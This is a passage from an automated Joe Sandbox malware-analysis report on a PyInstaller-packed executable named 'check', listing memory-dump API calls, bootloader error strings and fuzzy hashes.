                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                • Instruction ID: eef66ada291cc80076ffea325b1c89de4a3986c0e0f6f1b52162a56686efd9e4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA214421B0DA42C6E7458B7AB85417A6250EF8DB9CF688171DA1FC33F9DF2CD9918211
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: -$:$f$p$p
                                                                                                                                                                                                                • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                • Instruction ID: 08645f7c466fc2e3527eae089f4159f136b298103980d53bfef052841ef55479
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E129261E0C243A6FB605E14D1542797692FB58F58FA4C1B5E68BC76E8FF3CE9808B04
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: f$f$p$p$f
                                                                                                                                                                                                                • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                • Instruction ID: f65d9c633da904842820c021b2a5dc6cf98e533157772355c90c91a849037440
                                                                                                                                                                                                                • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9512A562E0C14396FB605B14E0442B976A1FB49F58FA8C171D69BD6AE4FF7CE5A08B00
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                • Opcode ID: d887d44ea8411714a319a2ddb58e34d6532429a931d40157cb204db5ad1c3ab0
                                                                                                                                                                                                                • Instruction ID: 190c4deb8c4d61c44c890b7620bb91dcd5317dfee3202a77913308495ad819ea
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d887d44ea8411714a319a2ddb58e34d6532429a931d40157cb204db5ad1c3ab0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A419361B0865292EA10DB25E8006BA6395BF4DBCCF74C4B1ED4ED77A6DF3CE9218740
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                • Opcode ID: 04eae6a6e28014538c265d314aaf186d5e7ccf6377acaf4908732b6d0be74f73
                                                                                                                                                                                                                • Instruction ID: ec3bb898d4a52fb4b57048cb217f8ea77630ef5141b5096522c222b39f267e14
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04eae6a6e28014538c265d314aaf186d5e7ccf6377acaf4908732b6d0be74f73
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40418121A0864696EA10DB21D4001B96390BF4E79CF64C5B2ED4FD7BA9EF3CE9228744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                • Instruction ID: cff660daff76289fd465b505127398912a96b1a53a906a606e39304ba08a6182
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DD17033A087418AEB209B65D4403AD77A0FB5A78CF208175DE4ED7BA5DF38E9A5C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF60B123706,?,00007FF60B123804), ref: 00007FF60B122C9E
                                                                                                                                                                                                                • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF60B123706,?,00007FF60B123804), ref: 00007FF60B122D63
                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF60B122D99
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                • API String ID: 3940978338-251083826
                                                                                                                                                                                                                • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                • Instruction ID: a0b362aafc76152c99c3d42619b74eece519d441d04c92d0bbb646b3934bf014
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4431C532B08A4142E6209B25B8542AB7691BF8DB9CF518135EF4ED3769EF3CD516C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF60B12DF7A,?,?,?,00007FF60B12DC6C,?,?,?,00007FF60B12D869), ref: 00007FF60B12DD4D
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF60B12DF7A,?,?,?,00007FF60B12DC6C,?,?,?,00007FF60B12D869), ref: 00007FF60B12DD5B
                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF60B12DF7A,?,?,?,00007FF60B12DC6C,?,?,?,00007FF60B12D869), ref: 00007FF60B12DD85
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF60B12DF7A,?,?,?,00007FF60B12DC6C,?,?,?,00007FF60B12D869), ref: 00007FF60B12DDF3
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF60B12DF7A,?,?,?,00007FF60B12DC6C,?,?,?,00007FF60B12D869), ref: 00007FF60B12DDFF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                • Instruction ID: 3ddaa71d33a9d571ab7db4882a259b19ead3310faeb24ab07f1519a2a26dc2f1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2231D021B1AA0691EE129B12E8006B523A4FF4DBACF698575DD1FC73E0EF3CE8548300
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                • Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                • Instruction ID: 98500db4fb563a594ef4599f05a80e44967fb80b36fb4e66a2907edd6773a11c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD418531A1D68691EA11DB20E4541EA6351FF5D38CFA08172DA5EC36F5EF3CE925C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF60B12351A,?,00000000,00007FF60B123F23), ref: 00007FF60B122AA0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                • Instruction ID: e4e1f717ce4e09c7e56fa7ce0984472a905fd5eb86afed83949ae1bcb7d739d1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E219C32A18B8192E6209B51B8817EA7294FB8C7C8F508172EE8ED3669DF3CD6558640
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                • Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                • Instruction ID: c907e2516058c78d0b1954a8c8524751bf9bc7810986930c15fb93b6788f290a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F211D21E0C642C1F9656325665123E62529F4CFB8F34C7B4D93FC66E6FE2CA4414300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                • Instruction ID: c1abad2a0957b504f83d9c164494e5cb03005554dd4fbb7180c6288b5740c349
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7117F21A18A4186E7508B16F85433A72A4FB8CBECF248274EA5EC77A4DF3CE9158744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF60B123FB1), ref: 00007FF60B128EFD
                                                                                                                                                                                                                • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF60B123FB1), ref: 00007FF60B128F5A
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B129390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF60B1245F4,00000000,00007FF60B121985), ref: 00007FF60B1293C9
                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF60B123FB1), ref: 00007FF60B128FE5
                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF60B123FB1), ref: 00007FF60B129044
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF60B123FB1), ref: 00007FF60B129055
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF60B123FB1), ref: 00007FF60B12906A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3462794448-0
                                                                                                                                                                                                                • Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                • Instruction ID: 69388d66c6be62860dac8b04b9100ea937e78ecc5c39851268ee6ac665c31a89
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B941D562B1968681EA349B15A4002BA7394FF8EBC8F148175DF8ED77A9DF3CD910C744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF60B134F11,?,?,?,?,00007FF60B13A48A,?,?,?,?,00007FF60B13718F), ref: 00007FF60B13B2D7
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF60B134F11,?,?,?,?,00007FF60B13A48A,?,?,?,?,00007FF60B13718F), ref: 00007FF60B13B30D
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF60B134F11,?,?,?,?,00007FF60B13A48A,?,?,?,?,00007FF60B13718F), ref: 00007FF60B13B33A
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF60B134F11,?,?,?,?,00007FF60B13A48A,?,?,?,?,00007FF60B13718F), ref: 00007FF60B13B34B
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF60B134F11,?,?,?,?,00007FF60B13A48A,?,?,?,?,00007FF60B13718F), ref: 00007FF60B13B35C
                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF60B134F11,?,?,?,?,00007FF60B13A48A,?,?,?,?,00007FF60B13718F), ref: 00007FF60B13B377
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                • Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                • Instruction ID: 51082b78a0c1320924da07d14e0aea167bf04dfce994046c1df7e09e9100ae7d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6115C21E0C65282FA58A725969113E22529F4CFB8F34C7B4E82FD76F6FE2CA5024300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF60B121B6A), ref: 00007FF60B12295E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
